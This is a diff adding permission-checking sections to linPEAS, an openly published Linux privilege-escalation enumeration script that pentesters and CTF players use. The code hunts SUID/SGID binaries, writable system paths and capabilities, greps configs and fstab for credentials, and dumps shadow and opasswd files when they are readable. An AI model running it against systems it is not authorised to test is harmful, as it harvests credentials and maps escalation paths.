-    timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
-  fi
-  wait
-  echo ""
-
-  ##-- IF) Find possible conf files with passwords
-  print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)"
-  if ! [ "$SEARCH_IN_FOLDER" ]; then
-    ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
-  else
-    ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
-  fi
-  printf "%s\n" "$ppicf" | while read f; do
-    if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then
-      echo "$ITALIC $f$NC"
-      grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
-    fi
-  done
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh
+++ b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh
@@ -0,0 +1,491 @@
+###########################################
+#-) Files with Interesting Permissions  (-#
+###########################################
+
+check_critial_root_path(){
+  folder_path="$1"
+  if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+  if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+  if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi
+}
+
+
+
+
+##-- IPF) SUID
+print_2title "SUID - Check easy privesc, exploits and write perms"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+if ! [ "$STRINGS" ]; then
+  echo_not_found "strings"
+fi
+if ! [ "$STRACE" ]; then
+  echo_not_found "strace"
+fi
+suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
+for s in $suids_files; do
+  s=$(ls -lahtr "$s")
+  #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
+  if echo "$s" | grep -qE "^total"; then break; fi
+
+  sname="$(echo $s | awk '{print $9}')"
+  if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
+    true #Don't do nothing
+  elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
+    echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
+  elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
+    echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  else
+    c="a"
+    for b in $sidB; do
+      if echo $s | grep -q $(echo $b | cut -d % -f 1); then
+        echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
+        c=""
+        break;
+      fi
+    done;
+    if [ "$c" ]; then
+      if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
+        echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
+      else
+        echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED},"
+        printf $ITALIC
+        if ! [ "$FAST" ]; then
+          
+          if [ "$STRINGS" ]; then
+            $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
+              sline_first="$(echo "$sline" | cut -d ' ' -f1)"
+              if echo "$sline_first" | grep -qEv "$cfuncs"; then
+                if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
+                  if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
+                    printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
+                  fi
+                else #If not a path
+                  if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
+                    printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
+                  fi
+                fi
+              fi
+            done
+          fi
+
+          if [ "$LDD" ] || [ "$READELF" ]; then
+            echo "$ITALIC  --- Checking for writable dependencies of $sname...$NC"
+          fi
+          if [ "$LDD" ]; then
+            "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+          fi
+          if [ "$READELF" ]; then
+            "$READELF" -d "$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+          fi
+          
+          if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then
+            printf $ITALIC
+            echo "----------------------------------------------------------------------------------------"
+            echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
+            OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
+            export LD_LIBRARY_PATH=""
+            timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
+            printf $NC
+            export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
+            echo "----------------------------------------------------------------------------------------"
+            echo ""
+          fi
+        
+        fi
+      fi
+    fi
+  fi
+done;
+echo ""
+
+
+##-- IPF) SGID
+print_2title "SGID"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
+for s in $sgids_files; do
+  s=$(ls -lahtr "$s")
+  #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
+  if echo "$s" | grep -qE "^total";then break; fi
+
+  sname="$(echo $s | awk '{print $9}')"
+  if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
+    true #Don't do nothing
+  elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
+    echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
+  elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
+    echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  else
+    c="a"
+    for b in $sidB; do
+      if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
+        echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
+        c=""
+        break;
+      fi
+    done;
+    if [ "$c" ]; then
+      if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
+        echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
+      else
+        echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED},"
+        printf $ITALIC
+        if ! [ "$FAST" ]; then
+        
+          if [ "$STRINGS" ]; then
+            $STRINGS "$sname" | sort | uniq | while read sline; do
+              sline_first="$(echo $sline | cut -d ' ' -f1)"
+              if echo "$sline_first" | grep -qEv "$cfuncs"; then
+                if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
+                  if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
+                    printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
+                  fi
+                else #If not a path
+                  if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
+                    printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
+                  fi
+                fi
+              fi
+            done
+          fi
+
+          if [ "$LDD" ] || [ "$READELF" ]; then
+            echo "$ITALIC  --- Checking for writable dependencies of $sname...$NC"
+          fi
+          if [ "$LDD" ]; then
+            "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+          fi
+          if [ "$READELF" ]; then
+            "$READELF" -d "$sname" | grep PATH | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+          fi
+            
+          if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then
+            printf "$ITALIC"
+            echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
+            timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
+            printf "$NC"
+            echo ""
+          fi
+        
+        fi
+      fi
+    fi
+  fi
+done;
+echo ""
+
+##-- IPF) Misconfigured ld.so
+if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then
+  print_2title "Checking misconfigurations of ld.so"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so"
+  if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then 
+    echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
+    printf $RED$ITALIC"/etc/ld.so.conf\n"$NC;
+  else
+    printf $GREEN$ITALIC"/etc/ld.so.conf\n"$NC;
+  fi
+
+  echo "Content of /etc/ld.so.conf:"
+  cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+
+  # Check each configured folder
+  cat /etc/ld.so.conf 2>/dev/null | while read l; do
+    if echo "$l" | grep -q include; then
+      ini_path=$(echo "$l" | cut -d " " -f 2)
+      fpath=$(dirname "$ini_path")
+
+      if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ]; then 
+        echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
+        printf $RED_YELLOW$ITALIC"$fpath\n"$NC;
+      else
+        printf $GREEN$ITALIC"$fpath\n"$NC;
+      fi
+
+      if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then
+        echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
+      fi
+
+      for f in $fpath/*; do
+        if [ -w "$f" ]; then 
+          echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
+          printf $RED_YELLOW$ITALIC"$f\n"$NC;
+        else
+          printf $GREEN$ITALIC"  $f\n"$NC;
+        fi
+
+        cat "$f" | grep -v "^#" | while read l2; do
+          if [ -f "$l2" ] && [ -w "$l2" ]; then 
+            echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
+            printf $RED_YELLOW$ITALIC"  - $l2\n"$NC;
+          else
+            echo $ITALIC"  - $l2"$NC | sed -${E} "s,$l2,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g";
+          fi
+        done
+      done
+    fi
+  done
+  echo ""
+
+
+  if [ -f "/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then 
+    echo "You have write privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
+  else
+    printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC;
+  fi
+  cat /etc/ld.so.preload 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+  cat /etc/ld.so.preload 2>/dev/null | while read l; do
+    if [ -f "$l" ] && [ -w "$l" ]; then echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+  done
+
+fi
+
+##-- IPF) Capabilities
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Capabilities"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
+  if [ "$(command -v capsh)" ]; then
+
+    print_3title "Current shell capabilities"
+    cat "/proc/$$/status" | grep Cap | while read -r cap_line; do
+      cap_name=$(echo "$cap_line" | awk '{print $1}')
+      cap_value=$(echo "$cap_line" | awk '{print $2}')
+      if [ "$cap_name" = "CapEff:" ]; then
+        echo "$cap_name	 $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")"
+      else
+        echo "$cap_name  $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")"
+      fi
+    done
+    echo ""
+
+    print_3title "Parent process capabilities"
+    cat "/proc/$PPID/status" | grep Cap | while read -r cap_line; do
+      cap_name=$(echo "$cap_line" | awk '{print $1}')
+      cap_value=$(echo "$cap_line" | awk '{print $2}')
+      if [ "$cap_name" = "CapEff:" ]; then
+        echo "$cap_name	 $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")"
+      else
+        echo "$cap_name	 $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")"
+      fi
+    done
+    echo ""
+  
+  else
+    print_3title "Current shell capabilities"
+    (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
+    echo ""
+    
+    print_3title "Parent proc capabilities"
+    (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status"
+    echo ""
+  fi
+  echo ""
+  echo "Files with capabilities (limited to 50):"
+  getcap -r / 2>/dev/null | head -n 50 | while read cb; do
+    capsVB_vuln=""
+    
+    for capVB in $capsVB; do
+      capname="$(echo $capVB | cut -d ':' -f 1)"
+      capbins="$(echo $capVB | cut -d ':' -f 2)"
+      if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then
+        echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+        capsVB_vuln="1"
+        break
+      fi
+    done
+    
+    if ! [ "$capsVB_vuln" ]; then
+      echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
+    fi
+
+    if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then
+      echo "$cb is writable" | sed -${E} "s,.*,${SED_RED},"
+    fi
+  done
+  echo ""
+fi
+
+##-- IPF) Users with capabilities
+if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then
+  print_2title "Users with capabilities"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
+  if [ -f "/etc/security/capability.conf" ]; then
+    grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+  else echo_not_found "/etc/security/capability.conf"
+  fi
+  echo ""
+fi
+
+##-- IPF) AppArmor profiles to prevent suid/capabilities abuse
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then
+    print_2title "AppArmor binary profiles"
+    ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\."
+    echo ""
+  fi
+fi
+
+##-- IPF) Files with ACLs
+print_2title "Files with ACLs (limited to 50)"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls"
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+else
+  ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+fi
+
+if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then  #Find ACL files in macos (veeeery slow)
+  ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+fi
+echo ""
+
+##-- IPF) Files with ResourceFork
+#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER
+#  print_2title "Files with ResourceFork"
+#  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads"
+#  find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
+#fi
+#echo ""
+
+##-- IPF) Files (scripts) in /etc/profile.d/
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Files (scripts) in /etc/profile.d/"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files"
+  if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
+    (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
+    check_critial_root_path "/etc/profile"
+    check_critial_root_path "/etc/profile.d/"
+  fi
+  echo ""
+fi
+
+  ##-- IPF) Files (scripts) in /etc/init.d/
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+print_2title "Permissions in init, init.d, systemd, and rc.d"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d"
+  if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
+    check_critial_root_path "/etc/init/"
+    check_critial_root_path "/etc/init.d/"
+    check_critial_root_path "/etc/rc.d/init.d"
+    check_critial_root_path "/usr/local/etc/rc.d"
+    check_critial_root_path "/etc/rc.d"
+    check_critial_root_path "/etc/systemd/"
+    check_critial_root_path "/lib/systemd/"
+  fi
+
+  echo ""
+fi
+
+
+
+##-- IPF) Hashes in passwd file
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_list "Hashes inside passwd file? ........... "
+  if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  ##-- IPF) Writable in passwd file
+  print_list "Writable passwd file? ................ "
+  if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  else echo_no
+  fi
+
+  ##-- IPF) Credentials in fstab
+  print_list "Credentials in fstab/mtab? ........... "
+  if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  ##-- IPF) Read shadow files
+  print_list "Can I read shadow files? ............. "
+  if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  print_list "Can I read shadow plists? ............ "
+  possible_check=""
+  (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+  print_list "Can I write shadow plists? ........... "
+  possible_check=""
+  (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+  ##-- IPF) Read opasswd file
+  print_list "Can I read opasswd file? ............. "
+  if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
+  else echo_no
+  fi
+
+  ##-- IPF) network-scripts
+  print_list "Can I write in network-scripts? ...... "
+  if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  else echo_no
+  fi
+
+  ##-- IPF) Read root dir
+  print_list "Can I read root folder? .............. "
+  (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
+  echo ""
+fi
+
+##-- IPF) Root files in home dirs
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Searching root files in home dirs (limit 30)"
+  (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found
+  echo ""
+fi
+
+##-- IPF) Others files in my dirs
+if ! [ "$IAMROOT" ]; then
+  print_2title "Searching folders owned by me containing others files on it (limit 100)"
+  (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
+  echo ""
+fi
+
+##-- IPF) Readable files belonging to root and not world readable
+if ! [ "$IAMROOT" ]; then
+  print_2title "Readable files belonging to root and readable by me but not world readable"
+  (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
+  echo ""
+fi
+
+##-- IPF) Interesting writable files by ownership or all
+if ! [ "$IAMROOT" ]; then
+  print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
+  #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
+  obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+  printf "%s\n" "$obmowbe" | while read entry; do
+    if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+    elif echo "$entry" | grep -qE "$writeVB"; then
+      echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+    else
+      echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+    fi
+  done
+  echo ""
+fi
+
+##-- IPF) Interesting writable files by group
+if ! [ "$IAMROOT" ]; then
+  print_2title "Interesting GROUP writable files (not in Home) (max 500)"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
+  for g in $(groups); do
+    iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+    if [ "$iwfbg" ] || [ "$DEBUG" ]; then
+      printf "  Group $GREEN$g:\n$NC";
+      printf "%s\n" "$iwfbg" | while read entry; do
+        if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+        elif echo "$entry" | grep -Eq "$writeVB"; then
+          echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+        else
+          echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+        fi
+      done
+    fi
+  done
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh
+++ b/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh
@@ -1,6 +0,0 @@
-
-if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
-    peass{REGEXES}
-else
-    echo "Regexes to search for API keys aren't activated, use param '-r' "
-fi
--- a/linPEAS/builder/linpeas_parts/9_interesting_files.sh
+++ b/linPEAS/builder/linpeas_parts/9_interesting_files.sh
@@ -0,0 +1,315 @@
+###########################################
+#----------) Interesting files (----------#
+###########################################
+
+
+##-- IF) .sh files in PATH
